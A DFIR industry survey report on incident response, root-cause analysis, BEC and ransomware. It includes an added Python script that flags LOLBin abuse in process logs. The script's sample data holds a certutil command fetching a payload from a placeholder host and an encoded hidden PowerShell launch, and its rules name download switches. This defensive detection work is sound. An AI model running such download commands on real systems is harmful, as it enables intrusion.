FINDING #1: Digital Forensics is Increasingly About Incident Response
Today’s DFIR professionals are more likely than not to be considered part of the organization’s broader security operations (SecOps) function, which speaks to the shifting nature of where their expertise is applied.
Nearly one third of respondents indicated that identifying the root cause of incidents—which is crucial for containing the threat and strengthening security postures—requires either a complete overhaul (10%) or at least major improvements (23%).
42% of DFIR professionals report that evolving cyberattack techniques are either a large or extreme problem for investigations, illustrating that it’s essential that DFIR teams are equipped to keep pace with adversaries’ expansive and growing arsenal of TTPs.
For many years, digital forensics within a corporate setting applied primarily to resolving human resources issues (e.g., personnel disputes, harassment complaints), assessing policy violations (e.g., misuse of corporate assets), fulfilling legal obligations (e.g., eDiscovery), and investigating malicious insiders (e.g., fraud, data exfiltration, and intellectual property theft). For such use cases, dead box forensics was typically used to investigate specific endpoints or malicious insiders.
However, as the digital transformation opened up new attack vectors and made it easier for threat actors — particularly external adversaries — to conduct their operations, investigations became more complex, and forensics became more important. One result of this trend is that the tools and techniques of digital forensics are increasingly being integrated into formalized incident response (IR), the processes and activities that allow organizations to:
Identify, contain, resolve, and recover from cyberattacks;
Prepare evidence that can be used to support insurance claims, pursue legal avenues, and demonstrate duty of care to regulators; and
Inform strategies and tactics to harden defenses against future attacks.
Recent high-profile breaches and relentless innovation in cyberattacks have led to a shift in how organizations perceive risk, with many recognizing that the important question is not if a breach will occur but when. This “assume breach” mentality forces organizations to make sure they’re prepared to handle a security incident, and is a driving force behind the Zero Trust (ZT) cybersecurity paradigm.
A related outcome is that organizations have increased their investment in technologies, including deep-dive analysis capabilities, that support a more robust incident response. These technologies help ensure that organizations are prepared when a breach actually does occur. This has necessitated a migration from dead box forensics (which can be slow and logistically challenging) to a more dynamic approach that enables deep analysis without needing a full forensic acquisition.
“The increasing sophistication of attacker TTPs requires an increasingly sophisticated response. As organizational defenders, incident responders and forensic investigators are working together to uncover the root cause of incidents in order to harden their environments and improve their security controls.”
The growing emphasis on digital forensics as a crucial component of cybersecurity overall, and incident response in particular, is changing how organizations are structured. In general, today’s corporate DFIR professionals are considered part of the organization’s security operations (SecOps) team, within the security operations center (SOC).
For smaller organizations, there’s a 50% chance that personnel fulfilling DFIR functions are within the SOC, but the likelihood increases as the organization becomes larger, peaking with 77% for professionals within companies that have 2,500 to 4,999 employees. At 10,000 employees or more, DFIR professionals are more likely than not to be part of a dedicated DFIR group.
Cyberattackers employ a lot of different techniques to gain initial access into IT environments, and while identifying the root cause of an incident isn’t easy (51% of respondents regard doing so as at least moderately challenging), few DFIR activities are as worthwhile. That’s because containing an event, recovering from it (where applicable), and learning lessons all require, or at least strongly benefit from, accurately determining the incident’s root cause.
Crucially, these learnings contribute to a feedback loop that guides organizations as they implement new safeguards and processes, such as updating response plans and identifying missing or required control points as part of their standard IR plan, that reduce the likelihood of future incidents. Additionally, digital forensics is critical to identifying the scope of a breach. For example, pinpointing a few hosts that exhibited lateral movement or data exfiltration isn’t enough to determine if the preliminary breach or toolset remains elsewhere in the environment. Digital forensics can help root out attacker infrastructure and help to shut down a repeat incident.
The longer it takes to identify the root cause of a cybersecurity incident, the greater the threat to business continuity. While 17% of respondents reported that it takes less than 24 hours, on average, to determine the root cause (Figure 2), more than a third (36%) said that doing so takes between one day and one week. More worryingly, 22% indicated that it takes between one week and one month, and 21% reported that finding the root cause takes even longer than that.
These findings should concern security leaders, as delays open up opportunities for further attacks and disruption—after all, if you don’t know how an adversary got in, then how will you keep them out in the future? For their part, DFIR professionals already recognize the need for improvements. When asked to what extent their organization needs to improve upon several DFIR functions, 10% of respondents indicated that identifying the root cause of incidents required a complete overhaul, and a further 23% suggested that major improvements were necessary.
“The ability to get to root cause depends heavily on the resources of the team responsible. If the analysts are spending most of their time on whack-a-mole malware activities, there isn’t proper time for root cause analysis.”
Put another way, 33% of corporate DFIR experts—one out of every three—are reporting that a critical ability requires considerable investments (and if the 10% figure doesn’t seem ‘big enough,’ we’ll note that no other function received such support for an overhaul).
“When you can identify and close the gaps discovered through root cause analysis, threat actors can no longer exploit the same vulnerability again, so teams can work towards a gradual reduction in breaches in addition to reducing the overall attack surface.”
[Figure 2: Root cause: time to determine]
The evolution of DFIR shows up in the incidents that organizations most frequently encounter (Figure 3), as adversary-driven security events top the list. Data exfiltration or IP theft takes the number one spot, with 35% of respondents indicating that their organization encounters this type of security incident at least somewhat to very frequently.
While data exfiltration or IP theft are the most frequent events encountered, the three most common ways an organization can become a victim of such a data breach are double-extortion ransomware, business email compromise (BEC) scams, or a malicious insider—with ransomware being the most likely culprit.
We’ll examine ransomware and data exfiltration or IP theft more in a moment, but first we’ll look at BEC. These scams, in which a cybercriminal pretends to be a trusted contact and attempts to trick the recipient into transferring funds or information, can be especially damaging (the FBI reported in May 2022 that exposed losses from such scams added up to $43 billion, globally). Once funds have been transferred, they can be very difficult to recover, as scammers use bank transfers and cryptocurrency tumblers to immediately move the proceeds of their crimes elsewhere. Likewise, if intellectual property, trade secrets, personally identifiable information (PII), or any other digital data is sent to a fraudster, the victim organization cannot control or prevent it from spreading further.
Unfortunately, large amounts of publicly available information (e.g., about partners, vendors, etc.) help threat actors develop highly convincing lures. Add in the small likelihood of prosecution and a range of techniques for executing these attacks (e.g., spoofing, spearphishing, malware), and conditions are ripe for widespread attacks. In fact, 14% of survey respondents indicated that their organization encounters BEC scams very frequently.
BEC scams rely heavily upon social engineering tactics to create a feeling of trust, allowing attackers to trick users. Especially sophisticated BEC scams may employ malware like Emotet or Qakbot (which themselves are often introduced via social engineering) that can hijack existing email threads, making the scammer’s actions seem even more credible. Consequently, one of the most important defenses against these types of attacks is to invest in an effective phishing and security awareness training (PSAT) program to help increase awareness of such threats and build the organization’s cyber resilience.
In addition to having preventative measures in place (e.g., PSAT, a vulnerability management program, endpoint defenses, detection and response capabilities, etc.), organizations should keep detailed logs that can be incorporated into forensic investigations. Moreover, having a simple way for employees to report suspicious emails—along with an amnesty policy—can encourage a culture of vigilance.
Security incidents can have significant impacts on organizations, and the impacts are not limited to direct costs (e.g., ransoms paid) or to the duration of the attack. For example, IBM’s much-cited Cost of a Data Breach report incorporates four process-related activities into its expenses:
Detection and escalation: Activities that enable a company to reasonably detect the breach, including forensic and investigative activities, assessment and audit services, crisis management, and communications to executives and boards
Notification: Activities that enable the company to notify data subjects, data protection regulators and other third parties, including: emails, letters, outbound calls or general notice to data subjects; determination of regulatory requirements;communication with regulators; and engagement of outside experts
Post-incident response: Activities to help victims of a breach communicate with the company and redress activities to victims and regulators, including: help desk and inbound communications; credit monitoring and identity protection services; issuing new accounts or credit cards; legal expenditures; product discounts; and regulatory fines
Lost business: Business disruption and revenue losses, including: business disruption and revenue losses from system downtime; cost of losing customers and acquiring new customers; and reputation losses and diminished goodwill
With such costs and consequences in mind, the survey respondents indicated that ransomware-infected endpoints have the highest impact to their respective organizations or clients (Figure 4).
[Figure 4: Impact of incidents (highest to lowest)]
Unfortunately, a mature ransomware ecosystem has flourished and attackers (e.g., LockBit, Alphv and Black Basta to name a few) are good at applying pressure to extract payments. In this new threat landscape, cybercrime perpetrators called initial access brokers (IABs) operate broad campaigns to enter dozens, hundreds, or even thousands of IT environments. Next, they perform some reconnaissance activities to identify the network owner (i.e., the organization), establish some degree of persistence, and gather additional intelligence. Then, they post the details of the compromised network (e.g., scale of compromise/infiltration, victim’s industry, victim’s annual revenue, etc.) on a cybercrime marketplace.
From there, a ransomware gang (or an affiliate) simply purchases the access and executes the ransomware attack, which typically combines the disruption of making systems and data unavailable with exfiltration of sensitive data and the very real threat of publicly releasing it.
In addition to causing potential embarrassment and personal friction (e.g., through the publication of HR files, personnel details, correspondence from executives, salary data, etc.) and harming competitive positions in the marketplace (e.g., by posting trade secrets and other IP), threat actors know that publishing private data can lead to costly regulatory fines for the victim (e.g., when it includes PII).
This is likely why the survey respondents rated data exfiltration or IP theft as having the second-highest impact overall. However, it received more responses (19%) for the highest severity rating than ransomware did (16%) (Figure 4). A plausible interpretation is that the short-term disruption directly associated with the ransomware (e.g., system and data unavailability) is regarded as less severe than the long-term consequences of the data breach component. Clearly, adversaries have found a very real pain point they can use to apply pressure for ransom payments.
Both to contain damage and to make sure the cycle of hardening defenses is helpful, it’s critical that DFIR professionals be equipped to rapidly investigate ransomware and data breach incidents. However, cybercriminals are hard at work to make such investigations as difficult as possible.
In recent years, the vulnerability of the software supply chain has been driven home repeatedly. The full-service cybercrime economy has virtually eliminated barriers to entry, and zero-day exploits have impacted tens of thousands of organizations (e.g., ProxyLogon). Complicating matters further, threat actors have discovered TTPs that make it especially hard to detect, contain, and investigate their intrusions. For example, the use of stolen credentials has soared, as have attacks that target or leverage identity systems, both of which can make it even harder to separate intruders from insiders. In parallel, the increased use of built-in system commands (living-off-the-land binaries, or “LOLBins”) has made it much more difficult to detect intrusion actions against the backdrop of legitimate activity. Unfortunately, the continued innovation of threat actors reaps them great rewards. Cybercrime proceeds have soared in recent years (although there are signs that more organizations are choosing not to pay ransoms), and 42% of corporate DFIR professionals indicated that evolving cyberattack techniques pose either an extreme or large problem for their investigations. This result placed evolving cyberattack techniques ahead of all other factors listed by the survey and, worryingly, represents a 50% increase over last year’s figure of 28%.
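The difficulty the report describes with LOLBins is that the binary name alone is never a finding: certutil, rundll32 or PowerShell appear thousands of times a day in legitimate use. What separates abuse from routine activity is context, chiefly the parent process and the arguments. The following is an added example, not code from the report or its authors, of a small triage rule set that scores process-creation events on exactly that context. The pipe-delimited event format, the sample events, the rule list and the score weights are all constructed here for illustration and would be tuned to a real environment's baseline.

```python
"""Context-based LOLBin triage (added example; format, rules and weights are assumptions)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Built-in Windows binaries used legitimately every day but also commonly
# repurposed by intruders. Presence in this set only makes an event eligible
# for scoring; it contributes no score by itself.
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "powershell.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}

# Document handlers and mail clients rarely need to spawn these binaries.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Argument patterns that indicate the binary is doing something other than its
# routine administrative job (fetching remote content, running hidden/encoded code).
SUSPICIOUS_ARGS = [
    (re.compile(r"https?://", re.I), "remote URL on command line"),
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-urlcache\b", re.I), "certutil download switch"),
    (re.compile(r"/transfer\b", re.I), "bitsadmin transfer job"),
]

# Constructed sample events: host|user|parent|image|cmdline
SAMPLE_LOG = [
    "WS01|alice|explorer.exe|certutil.exe|certutil.exe -verify cert.cer",
    "WS02|bob|winword.exe|powershell.exe|powershell.exe -w hidden -enc AAAAEXAMPLE",
    "WS03|svc_backup|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f "
    "http://files.example.invalid/payload.bin out.bin",
    "WS04|carol|services.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL",
    "WS05|dave|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\inventory.ps1",
]


def parse_line(line):
    """Split one constructed log line into a ProcEvent (cmdline may contain no '|')."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(host, user, parent, image, cmdline)


def score_event(ev):
    """Return (score, reasons); 0 means nothing about the event stands out."""
    reasons = []
    if ev.image.lower() not in LOLBINS:
        return 0, reasons
    score = 0
    if ev.parent.lower() in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"launched by {ev.parent}")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(ev.cmdline):
            score += 2
            reasons.append(label)
    return score, reasons


def triage(lines, threshold=3):
    """Return [(score, event, reasons)] for events at or above threshold, highest first."""
    flagged = []
    for line in lines:
        ev = parse_line(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((score, ev, reasons))
    flagged.sort(key=lambda item: item[0], reverse=True)
    return flagged


if __name__ == "__main__":
    for score, ev, reasons in triage(SAMPLE_LOG):
        print(f"[{score}] {ev.host} {ev.user}: {ev.parent} -> {ev.image} ({'; '.join(reasons)})")
```

On the constructed sample, the certutil verification on WS01, the Control Panel launch on WS04 and the scripted inventory on WS05 score 0 even though all three are LOLBins, while the Office-spawned hidden, encoded PowerShell on WS02 and the certutil download on WS03 are surfaced. The weights are arbitrary; what matters for an investigation is that the rule records the reasons, so an analyst can see why an event was flagged and feed false positives back into the baseline.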
42% of DFIR professionals indicate that evolving cyberattack techniques present either an extreme or large problem for their investigations.
For what it’s worth, in the first edition of this report (published in 2021), DFIR professionals identified evolving cyberattack techniques as the most concerning trend. They’ve been sounding the alarm for at least a few years, and organizations would do well to listen.
KEEPING UP WITH CHANGING TTPS
Many cybercrime gangs operate like Fortune 500 companies—complete with R&D specialists focused on equipping the organization with new and ever-evolving TTPs. Staying up to date is a real challenge, but here are a few tips:
Follow the social media profiles/channels (e.g., Twitter, LinkedIn) of cybersecurity researchers and companies, as they’ll often post their own research or share/promote the research of industry peers
Given the uncertain future of Twitter, the infosec.exchange Mastodon instance has gained new prominence
Government and industry organizations (e.g., MITRE, CISA), and cybersecurity-specific news media are also great sources of intelligence
Search engine alerts, security mailing lists, and topic-specific social networking groups can also keep you apprised of the latest developments
By leveraging a cross-section of sources, you can increase the chances that important topics land in your inbox or alert stream!